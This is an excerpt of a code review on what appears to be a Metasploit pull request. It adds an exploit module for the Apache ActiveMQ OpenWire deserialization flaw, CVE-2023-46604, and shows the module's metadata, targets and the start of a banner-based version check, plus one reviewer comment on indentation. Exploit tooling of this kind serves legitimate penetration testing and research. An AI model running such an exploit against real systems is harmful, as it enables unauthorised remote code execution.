modules/exploits/multi/misc/apache_activemq_rce_cve_2023_46604.rb

```diff
@@ -0,0 +1,197 @@
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpServer
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::Retry
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Apache ActiveMQ Unauthenticated Remote Code Execution',
+        'Description' => %q{
+          This module exploits a deserialization vulnerability in the OpenWire transport unmarshaller in Apache
+          ActiveMQ. Affected versions include 5.18.0 through to 5.18.2, 5.17.0 through to 5.17.5, 5.16.0 through to
+          5.16.6, and all versions before 5.15.16.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'X1r0z', # Original technical analysis & exploit
+          'sfewer-r7', # MSF exploit & Rapid7 analysis
+        ],
+        'References' => [
+          ['CVE', '2023-46604'],
+          ['URL', 'https://github.com/X1r0z/ActiveMQ-RCE'],
+          ['URL', 'https://exp10it.cn/2023/10/apache-activemq-%E7%89%88%E6%9C%AC-5.18.3-rce-%E5%88%86%E6%9E%90/'],
+          ['URL', 'https://attackerkb.com/topics/IHsgZDE3tS/cve-2023-46604/rapid7-analysis'],
+          ['URL', 'https://activemq.apache.org/security-advisories.data/CVE-2023-46604-announcement.txt']
+        ],
+        'DisclosureDate' => '2023-10-27',
+        'Privileged' => false,
+        'Platform' => %w[win linux unix],
+        'Arch' => [ARCH_CMD],
+        # The Msf::Exploit::Remote::HttpServer mixin will bring in Exploit::Remote::SocketServer, this will set the
+        # Stance to passive, which is unexpected and results in the exploit running as a background job, as RunAsJob will
+        # be set to true. To avoid this happening, we explicitly set the Stance to Aggressive.
+        'Stance' => Stance::Aggressive,
+        'Targets' => [
+          [
+            'Windows',
+            {
+              'Platform' => 'win'
+            }
+          ],
+          [
+            'Linux',
+            {
+              'Platform' => 'linux'
+            }
+          ],
+          [
+            'Unix',
+            {
+              'Platform' => 'unix'
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          # By default ActiveMQ listens for OpenWire requests on TCP port 61616.
+          'RPORT' => 61616,
+          # The maximum time in seconds to wait for a session.
+          'WfsDelay' => 30
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+  end
+
+  def check
+    connect
+
+    res = sock.get_once
+
+    disconnect
+
+    return CheckCode::Unknown unless res
+
+    len, _, magic = res.unpack('NCZ*')
+
+    return CheckCode::Unknown unless res.length == len + 4
+
+    return CheckCode::Unknown unless magic == 'ActiveMQ'
+
+    if res =~ /ProviderVersion...(\d+\.\d+\.\d+)/
```

Comment:
```suggestion
    if res !~ /ProviderVersion...(\d+\.\d+\.\d+)/
        CheckCode::Detected
    end
```

Something like this would allow to reduce the level of nested indentation in this function.

Reply:
implemented something similar via [ea21036](https://github.com/rapid7/metasploit-framework/pull/18501/commits/ea21036995e942608c1274ad0d499e9ac2b3d52c) to reduce the nesting